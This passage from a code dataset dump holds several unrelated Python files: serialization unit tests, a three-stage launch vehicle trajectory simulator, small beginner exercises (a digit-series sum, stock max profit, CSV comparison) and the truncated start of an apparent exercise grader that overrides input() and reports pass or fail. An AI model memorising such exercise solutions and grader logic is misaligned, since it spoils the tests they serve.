round-trip\n roundtrip_serialized_bytes = actual_boxed_obj.serialize()\n self.assertEqual(b2x(expected_serialized_bytes), b2x(roundtrip_serialized_bytes))\n\nclass Test_JsonSerializationContext(unittest.TestCase):\n def test_varuint(self):\n for expected_value in (0, 1, 2**32):\n actual_value = boxed_varuint.json_deserialize({'i':expected_value}).i\n self.assertEqual(expected_value, actual_value)\n\n actual_json = boxed_varuint(actual_value).json_serialize()\n self.assertEqual({'i':expected_value}, actual_json)\n\n def test_bytes(self):\n for expected_json_value, expected_value in (('', b''), ('deadbeef', b'\\xde\\xad\\xbe\\xef')):\n actual_value = boxed_bytes.json_deserialize({'buf':expected_json_value}).buf\n self.assertEqual(expected_value, actual_value)\n\n actual_json = boxed_bytes(actual_value).json_serialize()\n self.assertEqual({'buf':expected_json_value}, actual_json)\n\nclass Test_HashSerializationContext(unittest.TestCase):\n def test_objs(self):\n \"\"\"Test object hashing\"\"\"\n for expected_hex_serialized_bytes, expected_hex_buf, expected_i, expected_hex_hash \\\n in load_test_vectors('valid_boxed_objs.json'):\n\n expected_buf = x(expected_hex_buf)\n expected_hash = x(expected_hex_hash)\n\n actual_hash = 
boxed_objs(expected_buf, expected_i).hash\n self.assertEqual(b2x(expected_hash), b2x(actual_hash))\n","sub_path":"test/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"275038080","text":"'''\r\nAuthor: Vishnu Suresh Nair\r\nCode to simulate 3 stage launch vehicle\r\nlv_init.py - loads all initial conditions and prerequisites\r\nmass_optimiser.py - stage optimizer for 3 stage LV\r\ncoe_from_sv.py - state vector to orbital elements conversion\r\n'''\r\n## Ascent Trajectory Design\r\nfrom scipy.optimize import minimize\r\nfrom scipy.interpolate import interp1d\r\nimport numpy as np\r\nfrom numpy import sin, cos, tan, pi, zeros as zr, matrix as mat, arctan as atan, \\\r\n arcsin as asin, arccos as acos, cross, square, shape, ones, append, \\\r\n multiply as mul, dot, arctan2 as atan2, matmul, exp, vstack, \\\r\n cumsum, arange, array, transpose as T, mean\r\nfrom functools import reduce\r\nimport math as math\r\nfrom numpy.linalg import norm, solve, inv\r\nfrom math import log, radians, sqrt, degrees as deg\r\nimport os\r\nfrom bisect import bisect_left\r\nfrom matplotlib import pyplot as plt\r\nimport xlrd\r\nimport xlsxwriter\r\nfrom lv_init_fin import *\r\nfrom coe_from_sv import *\r\nfrom multiprocessing import Pool, cpu_count\r\nimport itertools as it\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\n##----------------------------- Function Definitions ---------------------------\r\n\r\ndef rocket():\r\n global m_hs, m_init\r\n\r\n Th[x + 1], m[x + 1], mprop[x + 1], g[x + 1], Q[x + 1], D[x + 1], mach[x + 1], a[x + 1], am[x + 1], \\\r\n v[x + 1], vr[x + 1], vm[x + 1], vrm[x + 1], r[x + 1], alt[x + 1], aoa[x + 1], fpa[x + 1], \\\r\n lat_F[x + 1], long_F[x + 1], steerI[x + 1], rateI[x + 1], vAB[x + 1], AziA[x + 1], \\\r\n LB[x + 1], IB[x + 1], IG[x + 1], GA[x + 1], AB[x + 1], GB[x + 1] \\\r\n = lv_calc(mode, deltt, IL, gamma_air, R_air, j2, Re, Rs, mu, alt[x], m_init, \\\r\n mprop_init, flow_con0, mrate, r[x], v[x], vr[x], vAB[x], a[x], fpa[x], area, \\\r\n cd_data, mach_data, alt_data, P_data, T_data, rho_data, steerI[x], LB[x], IB[x], \\\r\n IG[x], GA[x], GB[x], Thrust, rateI[x], lat_F, long_F, Om_p)\r\n\r\n roll = steerI[x][0]\r\n\r\n # Roll Correction \r\n if roll < 0:\r\n steerI[i][0] = roll + min([abs(roll) / 2, 5 * delt]) * delt\r\n elif roll > 0:\r\n steerI[i][0] = roll - min([roll / 2, 5 * delt]) * delt\r\n\r\n if 115 <= alt[x] / 1000 <= 120:\r\n m_init -= m_hs\r\n if m_hs != 0:\r\n '''\r\n print('\\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\\n')\r\n print('\\tPAYLOAD FAIRING SEPERATED')\r\n print('\\tAltitude:', round(alt[x] / 1000, 2), 'kms')\r\n print('\\tTime:', round(tin, 3), 's')\r\n print('\\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\\n')\r\n '''\r\n m_hs = 0\r\n\r\n\r\n# ----------------------------------Table Lookup---------------------------------\r\ndef lookup(x, xs, ys):\r\n if x <= xs[0]: return ys[0]\r\n if x >= xs[-1]: return ys[-1]\r\n\r\n i = bisect_left(xs, x)\r\n k = (x - xs[i - 1]) / (xs[i] - xs[i - 1])\r\n y = k * (ys[i] - ys[i - 1]) + ys[i - 1]\r\n\r\n return y\r\n\r\n\r\n# ---------------------------RungeKutta Integration---------------------------#\r\ndef RK4(dx1, dx2, sep, y):\r\n # This program numericaly solves equations using RK4 iterations\r\n # To be used only for linear functions of time alone\r\n\r\n dx3 = (dx1 + dx2) / 2 # dx value at delt/2\r\n k1 = sep * dx1\r\n k2 = sep * dx3\r\n k3 = k2 # k2=k3 as 
only time is variable\r\n k4 = sep * dx2\r\n\r\n y += k1 / 6 + k2 / 3 + k3 / 3 + k4 / 6\r\n return y\r\n\r\n\r\n# ----------------------------------Gravity Model-------------------------------#\r\n# As per NASA CR-132689\r\ndef gravity(dist, J2, RE, MU):\r\n [x, y, z] = dist\r\n re = sqrt(x ** 2 + y ** 2 + z ** 2)\r\n R = RE / re\r\n Z = z / re\r\n J = (3 / 2) * J2\r\n\r\n p = 1 + J * (R ** 2) * (1 - 5 * Z ** 2)\r\n\r\n gx = -1 * MU * x * p / (re ** 3)\r\n gy = -1 * MU * y * p / (re ** 3)\r\n gz = -1 * (MU / re ** 3) * (1 + J * R ** 2 * (3 - 5 * Z ** 2)) * z\r\n\r\n g = [gx, gy, gz]\r\n\r\n return g\r\n\r\n\r\n# ------------------------------Co-ordinate Transformations----------------------\r\n# Inertial to Launch Pad frame\r\ndef ILmatrix(lat_L, long_L, AzL):\r\n IL1 = [cos(lat_L) * cos(long_L), cos(lat_L) * sin(long_L), sin(lat_L)]\r\n IL2 = [sin(lat_L) * cos(long_L) * sin(AzL) - cos(AzL) * sin(long_L),\r\n cos(AzL) * cos(long_L) + sin(AzL) * sin(lat_L) * sin(long_L), -sin(AzL) * cos(lat_L)]\r\n IL3 = [-sin(AzL) * sin(long_L) - cos(AzL) * sin(lat_L) * cos(long_L),\r\n sin(AzL) * cos(long_L) - cos(AzL) * sin(lat_L) * sin(long_L), cos(AzL) * cos(lat_L)]\r\n ILmat = [IL1, IL2, IL3]\r\n return array(ILmat)\r\n\r\n\r\n# -----------------Launch Vehicle to body frame transformation-------------------\r\ndef LBmatrix(phi, theta, psi):\r\n LB1 = [cos(psi) * cos(theta), cos(phi) * sin(psi) * cos(theta) + sin(phi) * sin(theta),\r\n sin(phi) * sin(psi) * cos(theta) - cos(phi) * sin(theta)]\r\n LB2 = [-sin(psi), cos(phi) * cos(psi), sin(phi) * cos(psi)]\r\n LB3 = [cos(psi) * sin(theta), cos(phi) * sin(psi) * sin(theta) - sin(phi) * cos(theta),\r\n sin(phi) * sin(psi) * sin(theta) + cos(phi) * cos(theta)]\r\n LBmat = [LB1, LB2, LB3]\r\n return array(LBmat)\r\n\r\n\r\n# ------------Earth Centered Inertial to body frame transformation---------------\r\ndef IBmatrix(LB_in, IL_in):\r\n IBmat = LB_in @ IL_in\r\n return IBmat\r\n\r\n\r\n# ----------------- Inertial to Geographic frame transformation-------------------\r\ndef IGmatrix(phi_c, theta_i):\r\n IGmat = [[-sin(phi_c) * cos(theta_i), -sin(phi_c) * sin(theta_i), cos(phi_c)],\r\n [-sin(theta_i), cos(theta_i), 0],\r\n [-cos(phi_c) * cos(theta_i), -cos(phi_c) * sin(theta_i), -sin(phi_c)]]\r\n\r\n return array(IGmat)\r\n\r\n\r\n# --------------------Geographic to Body frame transformation--------------------\r\ndef GBmatrix(phi_r, theta_r, psi_r):\r\n GBmat = [[cos(theta_r) * cos(psi_r), cos(theta_r) * sin(psi_r), -sin(theta_r)],\r\n [sin(phi_r) * sin(theta_r) * cos(psi_r) - cos(phi_r) * sin(psi_r),\r\n sin(phi_r) * sin(theta_r) * sin(psi_r) + cos(phi_r) * cos(psi_r),\r\n sin(phi_r) * cos(theta_r)],\r\n [cos(phi_r) * sin(theta_r) * cos(psi_r) + sin(phi_r) * sin(psi_r),\r\n cos(phi_r) * sin(theta_r) * sin(psi_r) - sin(phi_r) * cos(psi_r),\r\n cos(phi_r) * cos(theta_r)]]\r\n\r\n return array(GBmat)\r\n\r\n\r\n# ---Geographic to Atmospheric Relative Velocity System (ARVS) transformation----\r\ndef GAmatrix(gamma_a, lambda_a):\r\n GAmat = [[cos(gamma_a) * cos(lambda_a), cos(gamma_a) * sin(lambda_a), -sin(gamma_a)],\r\n [-sin(lambda_a), cos(lambda_a), 0],\r\n [sin(gamma_a) * cos(lambda_a), sin(gamma_a) * sin(lambda_a), cos(gamma_a)]]\r\n\r\n return array(GAmat)\r\n\r\n\r\n# -------------------------ARVS to body transformation---------------------------\r\ndef ABmatrix(al, bet, sig):\r\n ABmat = [[cos(al) * cos(bet), -cos(al) * sin(bet) * cos(sig) + sin(al) * sin(sig),\r\n -cos(al) * sin(bet) * sin(sig) - sin(al) * cos(sig)],\r\n [sin(bet), cos(bet) * 
cos(sig), cos(bet) * sin(sig)],\r\n [sin(al) * cos(bet), -sin(al) * sin(bet) * cos(sig) - cos(al) * sin(sig),\r\n -sin(al) * sin(bet) * sin(sig) + cos(al) * cos(sig)]]\r\n\r\n return array(ABmat)\r\n\r\n\r\n# -----------------------Inertial to Planet Relative transformation--------------\r\ndef IPmatrix(om, time):\r\n IPmat = [[cos(om * time), sin(om * time), 0],\r\n [-sin(om * time), cos(om * time), 0],\r\n [0, 0, 1]]\r\n\r\n return array(IPmat)\r\n\r\n\r\n# --------------------------------Drag Calculation-------------------------------\r\ndef drag_calc(V, a, rho, area, cd_data, mach_data):\r\n mach = norm(V) / a;\r\n if mach < max(mach_data):\r\n cd = lookup(mach, mach_data, cd_data) # import Cd as function of Mach\r\n else:\r\n cd = 0\r\n # cd = 0.3\r\n Q = 0.5 * rho * (norm(V)) ** 2\r\n drag = array([cd * area * Q, 0, 0])\r\n return drag, Q, mach\r\n\r\n\r\n# --------------Calculate r,v,a,gamma,alpha,phi,theta,psi,mach,D,Q---------------\r\ndef lv_calc(fmode, dt, IL, gamma_amb, R_amb, j2, Re, Rs, mu, alt_i, m0, mprop0, mc, md, rI_i, \\\r\n vI_i, vAI_i, vAB_i, aI_i, fpa_i, area, cd_data, mach_data, alt_data, Pr, Temp, rho, \\\r\n steerI_i, LB_i, IB_i, IG_i, GA_i, GB_i, Th, rate_i, lat_i, long_i, Omp):\r\n # global tin,alt,r,v,vr,vm,vrm\r\n global tin\r\n\r\n # Ambient data\r\n T_amb, rho_amb = lookup(alt_i / 1000, alt_data, Temp), lookup(alt_i / 1000, alt_data, rho)\r\n a_amb = sqrt(gamma_amb * R_amb * T_amb)\r\n\r\n # Mass updation\r\n # deltat = t-t0\r\n mprop_out, m_out = mprop0 - mc - md * (tin - t0), m0 - mc - md * (tin - t0)\r\n\r\n g = array(gravity(rI_i, j2, Re, mu))\r\n Df, Q, mach = drag_calc(vAI_i, a_amb, rho_amb, area, cd_data, mach_data)\r\n Dfm = norm(Df)\r\n\r\n if fmode != 'GT':\r\n # Initiation of Velocities and Attitude angles (co-ordinate frame)\r\n phiI_i, thetaI_i, psiI_i = steerI_i[0], steerI_i[1], steerI_i[2]\r\n rr_i, pr_i, yr_i = rate_i[0], rate_i[1], rate_i[2]\r\n # (Inertial Euler Angles - final states)\r\n rr_f, pr_f, yr_f = rr_i, pr_i, yr_i\r\n phiI_f, thetaI_f, psiI_f = phiI_i + rr_f * dt, thetaI_i + pr_f * dt, psiI_i + yr_f * dt\r\n rate_out = array([rr_f, pr_f, yr_f])\r\n\r\n # Acceleration, Velocity and Position integration\r\n LB_f = LBmatrix(phiI_f, thetaI_f, psiI_f)\r\n IB_f = IBmatrix(LB_f, IL)\r\n Tf = array([Th, 0, 0])\r\n atB = (Tf - Df) / m_out\r\n aI_f = IB_f.T @ atB + g\r\n vI_f = RK4(aI_f, aI_i, dt, vI_i)\r\n rI_f = RK4(vI_f, vI_i, dt, rI_i)\r\n alt_f = norm(rI_f) - Rs\r\n\r\n # Holding criteria\r\n if alt_f < 0.0264:\r\n aI_f, vI_f, rI_f, alt_f = aI_i, vI_i, rI_i, norm(rI_f) - Rs\r\n\r\n vWI = array([0, 0, 0])\r\n vRI = vI_f - v[0]\r\n vAI_out = vRI + vWI\r\n\r\n # uRI = rI_f/norm(rI_f)\r\n # uVI = vI_f/norm(vI_f)\r\n # uVR = vRI/norm(vRI)\r\n # uVA = vAI_out/norm(vAI_out)\r\n # (Latitude and Longitude)\r\n # latc = asin(rI_f[2]/norm(rI_f))\r\n latc = atan2(rI_f[2], sqrt(rI_f[0] ** 2 + rI_f[1] ** 2))\r\n longI = atan2(rI_f[1], rI_f[0])\r\n # longR = longI-Omp[2]*(tin-t0)\r\n # Transformation to Geographic frame\r\n IG_f = IGmatrix(latc, longI)\r\n # vIG = IG_f@vI_f\r\n # vRG = IG_f@vRI\r\n vAG = IG_f @ vAI_out\r\n # (Flight Path Angles)\r\n # gammaI = asin(dot(uRI,uVI))\r\n # gammaR = asin(dot(uRI,uVR))\r\n # gammaA = asin(dot(uRI,uVA))\r\n gammaA = acos(vAG[0] / norm(vAG))\r\n # gammaA = atan2(vAG[2],vAG[0])\r\n # (Azimuth angles)\r\n # AzI = atan(vIG[1]/vIG[0])\r\n # AzR = atan(vRG[1]/vRG[0])\r\n AzA = atan(vAG[1] / vAG[0])\r\n # (Relative roll, pitch and yaw angles)\r\n GA_f = GAmatrix(gammaA, AzA)\r\n GB_f = IG_f.T @ IB_f # For symmetrix 
matrix, inv(IG) = transpose(IG)\r\n # psiR = atan(GB_f[0,1]/GB_f[0,0])\r\n # thetaR = -asin(GB_f[0,2])\r\n # phiR = atan(GB_f[1,2]/GB_f[2,2])\r\n # Transformation to body frame\r\n vAB_f = IB_f @ vAI_out\r\n # (Aerodynamic Angles)\r\n alpha = atan(vAB_f[2] / vAB_f[0])\r\n beta = atan(vAB_f[1] / sqrt(vAB_f[2] ** 2 + vAB_f[0] ** 2))\r\n sigma = atan((GB_f[1, 2] + sin(beta) * sin(alpha)) \\\r\n / ((GB_f[1, 1] * cos(AzA) - GB_f[1, 0]) * sin(AzA) * cos(gammaA)))\r\n AB_f = ABmatrix(alpha, beta, sigma)\r\n\r\n else:\r\n\r\n vAG = IG_i @ vAI_i\r\n gammaA = acos(vAG[0] / norm(vAG))\r\n AzA = atan(vAG[1] / vAG[0])\r\n GA_f = GAmatrix(gammaA, AzA)\r\n # Initiation of Velocities and Attitude angles (co-ordinate frame)\r\n phiI_i = steerI_i[0]\r\n thetaI_i = steerI_i[1]\r\n psiI_i = steerI_i[2]\r\n # (Inertial Euler Angles during Gravity Turn)\r\n # phiI_f = atan(LB_f[1,2]/LB_f[1,1])\r\n phiI_f = 0\r\n # psiI_f = -asin(LB_f[1,0])\r\n psiI_f = 0\r\n thetaI_f = gammaA - radians(90)\r\n rr_f, pr_f, yr_f = (phiI_f - phiI_i) / dt, (thetaI_f - thetaI_i) / dt, (psiI_f - psiI_i) / dt\r\n rate_out = array([rr_f, pr_f, yr_f])\r\n # Acceleration, Velocity and Position integration\r\n LB_f = LBmatrix(phiI_f, thetaI_f, psiI_f)\r\n IB_f = IBmatrix(LB_f, IL)\r\n Tf = array([Th, 0, 0])\r\n atB = (Tf - Df) / m_out\r\n aI_f = IB_f.T @ atB + g\r\n vI_f = RK4(aI_f, aI_i, dt, vI_i)\r\n rI_f = RK4(vI_f, vI_i, dt, rI_i)\r\n alt_f = norm(rI_f) - Rs\r\n\r\n # Holding criteria\r\n if alt_f < 0.0264:\r\n aI_f, vI_f, rI_f, alt_f = aI_i, vI_i, rI_i, norm(rI_f) - Rs\r\n\r\n vWI = array([0, 0, 0])\r\n vRI = vI_f - v[0]\r\n vAI_out = vRI + vWI\r\n # (Latitude and Longitude)\r\n # latc = asin(rI_f[2]/norm(rI_f))\r\n latc = atan2(rI_f[2], sqrt(rI_f[0] ** 2 + rI_f[1] ** 2))\r\n longI = atan2(rI_f[1], rI_f[0])\r\n # longR = longI-Omp[2]*(tin-t0)\r\n # Transformation to Geographic frame\r\n IG_f = IGmatrix(latc, longI)\r\n GB_f = IG_f.T @ IB_f # For symmetrix matrix, inv(IG) = transpose(IG)\r\n # Transformation to body frame\r\n vAB_f = IB_f @ vAI_out\r\n # (Aerodynamic Angles)\r\n alpha = 0\r\n beta = 0\r\n sigma = 0\r\n AB_f = ABmatrix(alpha, beta, sigma)\r\n\r\n # IP = IPmatrix(Omp[2],t)\r\n Tfm, aIm_f, vIm_f, vAIm_out = norm(Tf), norm(aI_f), norm(vI_f), norm(vAI_out)\r\n steerI_f = [phiI_f, thetaI_f, psiI_f]\r\n\r\n return Tfm, m_out, mprop_out, g, Q, Dfm, mach, aI_f, aIm_f, vI_f, vAI_out, vIm_f, \\\r\n vAIm_out, rI_f, alt_f, alpha, gammaA, latc, longI, steerI_f, rate_out, vAB_f, \\\r\n AzA, LB_f, IB_f, IG_f, GA_f, AB_f, GB_f\r\n\r\n# ----------------------------Rocket Main-------------------------------------\r\ndef rocket_main(*args):\r\n global mode, deltt, x, m_init, mprop_init, flow_con0, mrate, Thrust, tin, t0, \\\r\n tseries, idx, op_log, tags, values\r\n\r\n if len(args) == 0:\r\n pass\r\n\r\n # krate = prate_in[0]\r\n\r\n ind = 0\r\n idn = 0\r\n idx = zr(len(MS) - 1)\r\n Tmax = MS[-1][1]\r\n Tmin = MS[0][1]\r\n tseries = list(arange(Tmin + delt, Tmax + delt, delt))\r\n\r\n y = 0\r\n string0, string = MS[y], MS[y + 1]\r\n\r\n st_n, flag = int(string0[0]), string0[4]\r\n\r\n t0, Thrust0, flow_con0 = float(string0[1]), float(string0[2]), float(string0[3])\r\n t1, Thrust1, flow_con1 = float(string[1]), float(string[2]), float(string[3])\r\n # t,Thrust,flow_con = t1,mean([Thrust0,Thrust1]),mean([flow_con0,flow_con1])\r\n t, Thrust, flow_con = t1, Thrust1, flow_con1\r\n mrate = (flow_con1 - flow_con0) / (t1 - t0)\r\n\r\n m_init = mi[st_n - 1]\r\n mprop_init = mp[st_n - 1]\r\n\r\n for x, tin in enumerate(tseries):\r\n # 
print(\"Step: \",x)\r\n\r\n if tin < t and not np.isclose(tin, t):\r\n deltt = delt\r\n # print(not tin<=t<=tin+delt)\r\n if kstart <= tin <= kend:\r\n rateI[x] = array([0, krate, 0])\r\n mode = 'BR'\r\n elif gtstart < tin <= gtend:\r\n mode = 'GT'\r\n else:\r\n rateI[x] = array([0, 0, 0])\r\n mode = 'BR'\r\n\r\n rocket()\r\n\r\n elif tin >= t or np.isclose(tin, t):\r\n tseries[x] = t\r\n tin = t\r\n deltt = tseries[x] - tseries[x - 1]\r\n if kstart <= tin <= kend:\r\n rateI[x] = array([0, krate, 0])\r\n mode = 'BR'\r\n elif gtstart < tin <= gtend:\r\n mode = 'GT'\r\n else:\r\n mode = 'BR'\r\n\r\n rocket()\r\n\r\n y += 1\r\n\r\n if mode == 'BR':\r\n event = 'Variable Bodyrate Maneuver'\r\n elif mode == 'GT':\r\n event = 'Gravity Turn'\r\n elif mode == 'CO':\r\n event = 'Separation'\r\n# on_screen_disp(event, st_n, tin, alt[x] / 1000, vm[x], mprop[x], deg(fpa[x]), deg(aoa[x]), deg(steerI[x][1]))\r\n\r\n try:\r\n string0, string = MS[y], MS[y + 1]\r\n st_n, flag = int(string[0]), string[4]\r\n t0, Thrust0, flow_con0 = float(string0[1]), float(string0[2]), float(string0[3])\r\n t1, Thrust1, flow_con1 = float(string[1]), float(string[2]), float(string[3])\r\n # t,Thrust,flow_con = t1,mean([Thrust0,Thrust1]),mean([flow_con0,flow_con1])\r\n t, Thrust, flow_con = t1, Thrust1, flow_con1\r\n mrate = (flow_con1 - flow_con0) / (t1 - t0)\r\n\r\n except:\r\n print('\\n\\n1st Stage Burn Completed!')\r\n\r\n # Stage Initial Conditions\r\n\r\n idx[idn] = x;\r\n\r\n # plot_results(idx[idn-1],idx[idn],[eval(x) for x in pl])\r\n idn += 1\r\n ind += 1\r\n # t_data += time\r\n\r\n print('\\nStage ' + str(st_n) + 'Seperation\\n')\r\n # second and third stage\r\n for _ in range(2):\r\n st_n += 1\r\n thrusts, Isp, sf, p_rate, flow_con0, f_lo, n_seg = Thrust_in[st_n - 1], Sp_imp[st_n - 1], \\\r\n strf[st_n - 1], prate_in[st_n - 1], 0, m_lo[st_n - 1], segn[\r\n st_n - 1]\r\n if m_hs == 0:\r\n m_init = mi[st_n - 1] - m_PLF\r\n print('\\nPayload Fairing mass ' + str(m_PLF) + ' kgs removed \\n')\r\n print('\\nInitial mass ' + str(round(m_init / 1000, 3)) + ' T\\n')\r\n else:\r\n m_init = mi[st_n - 1]\r\n print('\\nInitial mass ' + str(round(m_init / 1000, 3)) + ' T\\n')\r\n\r\n mprop_init = mp[st_n - 1]\r\n Ms = mprop_init - f_lo\r\n Is = Ms * Isp * 9.8055\r\n tslices = zeros(n_seg)\r\n m_rate = zeros(n_seg)\r\n tsl = 0\r\n for l, thrust in enumerate(list(thrusts)):\r\n tsl = tsl + Is / (n_seg * thrust)\r\n tslices[l] = tseries[x] + tsl\r\n m_rate[l] = thrust / (9.8055 * Isp)\r\n tslices = [tseries[x]] + tslices.tolist()\r\n f = 0\r\n for _ in range(500000):\r\n t0 = tseries[x]\r\n x += 1\r\n tseries += [tseries[-1] + delt]\r\n tin = tseries[x]\r\n for f in range(len(tslices) - 1):\r\n tsi = tslices[f]\r\n tsf = tslices[f + 1]\r\n if tsi <= tin < tsf:\r\n prate = p_rate[f]\r\n Thrust = thrusts[f]\r\n mrate = m_rate[f]\r\n rateI[x] = [0, prate, 0]\r\n mode = 'BR'\r\n rocket()\r\n flow_con0 += mrate * delt\r\n\r\n if mode == 'BR':\r\n event = 'Variable Bodyrate Maneuver'\r\n elif mode == 'GT':\r\n event = 'Gravity Turn'\r\n elif mode == 'CO':\r\n event = 'Separation'\r\n\r\n #if round(tseries[x], 2) in np.around(tslices, 2):\r\n #on_screen_disp(event, st_n, tin, alt[x] / 1000, vm[x], mprop[x], deg(fpa[x]), deg(aoa[x]), deg(steerI[x][1]))\r\n if mprop_init - flow_con0 <= f_lo:\r\n print('\\nStage ' + str(st_n) + ' Seperation\\n')\r\n break\r\n\r\n # --------------------------------Orbital Elements---------------------------\r\n O_E = coe_from_sv(r[x], v[x], mu)\r\n Eta = O_E[0]\r\n hm = O_E[1]\r\n ecc = O_E[2]\r\n Om = 
O_E[3]\r\n inc = O_E[4]\r\n w = O_E[5]\r\n nu = O_E[6]\r\n semimaj = O_E[7]\r\n\r\n apg = semimaj * (1 + ecc) - Re\r\n prg = semimaj * (1 - ecc) - Re\r\n\r\n print('\\n=================================================\\n')\r\n print('\\tOrbit Properties')\r\n print('\\n\\t--------------------\\n')\r\n print('Eccentricity:', round(ecc, 3))\r\n print('Inclination:', round(deg(inc), 3), 'degrees')\r\n print('Apogee:', round(apg / 1000, 3), 'kms')\r\n print('Perigee:', round(prg / 1000, 3), 'kms')\r\n print('Right Ascension of Ascending Node:', round(deg(Om), 3), 'degrees')\r\n print('Argument of Periapsis:', round(deg(w), 3), 'degrees')\r\n print('True Anomaly:', round(deg(nu), 3), 'degrees')\r\n print('Orbital Energy:', round(Eta, 3), 'J/kg')\r\n print('Angular Momentum:', round(hm, 3), 'mps')\r\n print('\\n=================================================\\n')\r\n\r\n return vm[x],alt[x],deg(fpa[x]),\r\n \r\n\r\n################################ Function Definitions End ######################\r\n\r\n# -------------------------Import Stage Data-------------------------------------\r\nwith open(savepath + 'stage_data.txt', 'r') as f:\r\n staging_data = json.load(f)\r\n tags = staging_data[0]\r\n values = np.array(staging_data[1:4]).transpose().tolist()\r\nfor tag, value in zip(tags, values):\r\n locals()[tag] = value\r\n# ------------------------------ Preallocation ----------------------------------\r\nt, m, vm, vrm, Q, mprop, mach, alt, a, v, vr, r, g, steerI, rateI, fpa, lat_F, long_F, aoa, am, Th, \\\r\nD, AziA, vAB, LB, IB, GA, IG, AB, GB, t_data = zr(500000), zr(500000), zr(500000), \\\r\n zr(500000), zr(500000), zr(500000), zr(500000), zr(500000), zr(\r\n [500000, 3]), \\\r\n zr([500000, 3]), zr([500000, 3]), zr([500000, 3]), zr([500000, 3]), zr(\r\n [500000, 3]), \\\r\n zr([500000, 3]), zr(500000), zr(500000), zr(500000), zr(500000), zr(\r\n 500000), zr(500000) \\\r\n , zr(500000), zr(500000), zr([500000, 3]), zr([5000000, 3, 3]), zr([5000000, 3, 3]), \\\r\n zr([5000000, 3, 3]), zr([5000000, 3, 3]), zr([5000000, 3, 3]), zr(\r\n [5000000, 3, 3]), []\r\n\r\n# ------------------------------Initial Conditions-------------------------------\r\nm[0] = mi[0]\r\nmprop[0] = mp[0]\r\nv[0] = vi\r\nvr[0] = [0, 0, 0]\r\nr[0] = ri\r\ng[0] = gravity(ri, j2, Re, mu)\r\na[0] = g[0]\r\nalt[0] = norm(r[0]) - Rs\r\nt[0] = 0\r\nfpa[0] = pi / 2\r\nlat_F[0] = lat_L\r\nlong_F[0] = long_L\r\nm_hs = m_PLF\r\nsteerI[0] = [0, 0, 0]\r\nIL = ILmatrix(lat_L, long_L, AzL)\r\n# delt = 0.01\r\n\r\n# ------------------------------Run Main Program---------------------------------\r\n\r\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n","sub_path":"lv_simulator_3stage_optim_fin_v6.py","file_name":"lv_simulator_3stage_optim_fin_v6.py","file_ext":"py","file_size_in_byte":22018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"555049597","text":"'''\n题目:求s=a+aa+aaa+aaaa+aa...a的值,其中a是一个数字。例如2+22+222+2222+22222(此时共有5个数相加),几个数相加由键盘控制。\n'''\n\nif __name__ == '__main__':\n a = int(input(\"input element: \"))\n n = int(input(\"input number: \"))\n\n sum = 0\n val = a \n\n for i in range(n):\n sum += val\n val = val * 10 + a\n\n print(\"sum: %d\" %sum)\n \n","sub_path":"basic_execise/runoob_100_examples/e018_v00.py","file_name":"e018_v00.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571598580","text":"#!/usr/bin/python\n\nimport argparse\n\n# My solution that I 
understand\n# def find_max_profit(prices):\n# buy_price = prices[0]\n# sell_price = 0\n# profit = -1000000\n\n# for i in range(len(prices)):\n# each_price = prices[i]\n\n# if each_price < buy_price:\n# buy_price = each_price\n# sell_price = 0\n# elif each_price > sell_price:\n# sell_price = each_price\n# profit = sell_price - buy_price\n# return profit\n\n# Clunky solution to pass the test\ndef find_max_profit(prices):\n profit = -10\n buy_price = 0\n sell_price = 0\n\n change_buy_index = True\n\n for i in range( len(prices) - 1 ):\n sell_price = prices[i+1]\n\n if change_buy_index:\n buy_price = prices[i]\n\n if sell_price < buy_price:\n change_buy_index = True\n continue\n\n else:\n temp_profit = sell_price - buy_price\n if temp_profit > profit:\n profit = temp_profit\n change_buy_index = False\n return profit\n\n\n\nprice1 = [10, 7, 5, 8, 11, 9]\nprice2 = [100, 90, 80, 50, 20, 10]\nprice3 = [1050, 270, 1540, 3800, 2]\nprice4 = [100, 55, 4, 98, 10, 18, 90, 95, 43, 11, 47, 67, 89, 42, 49, 79] \n\nprint(find_max_profit(price1))\nprint(find_max_profit(price2))\nprint(find_max_profit(price3))\nprint(find_max_profit(price4))\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(profit=find_max_profit(args.integers), prices=args.integers))","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"84041616","text":"#!/usr/bin/env python\n\nimport csv\n\ndef csv_list(file):\n with open(file, \"r\", encoding=\"utf-8\") as fp:\n list1 = [i for i in csv.reader(fp)]\n return list1\n\ndef main():\n f = open(\"same.csv\",\"w\",encoding=\"utf-8\",newline=\"\")\n csv_writer = csv.writer(f)\n csv_writer.writerow([\"UUID\"])\n list1 = csv_list(\"2020.csv\")\n list2 = csv_list(\"2019.csv\")\n total = 0\n for i in list1:\n for j in list2:\n if i[0] == j[0]:\n csv_writer.writerow([i[0]])\n total += 1\n print(\"total: \", total)\n\nif __name__ == \"__main__\":\n main()","sub_path":"course/csv-compair.py","file_name":"csv-compair.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"490769700","text":"import random\nimport builtins\nimport time\nimport os\n\nanc_input = builtins.input\néchec = True\n\n\nentrées = [random.randrange(0, 999) for i in range(10)]\n\n\ndef send_msg(channel, msg):\n print(\"TECHIO> message --channel \\\"{}\\\" \\\"{}\\\"\".format(channel, msg))\n\n\ndef success():\n print(\"TECHIO> success true\")\n\n\ndef fail():\n print(\"TECHIO> success false\")\n\n\ndef nouv_input(*params):\n global échec\n\n if len(params) > 1:\n échec = True\n\n elif 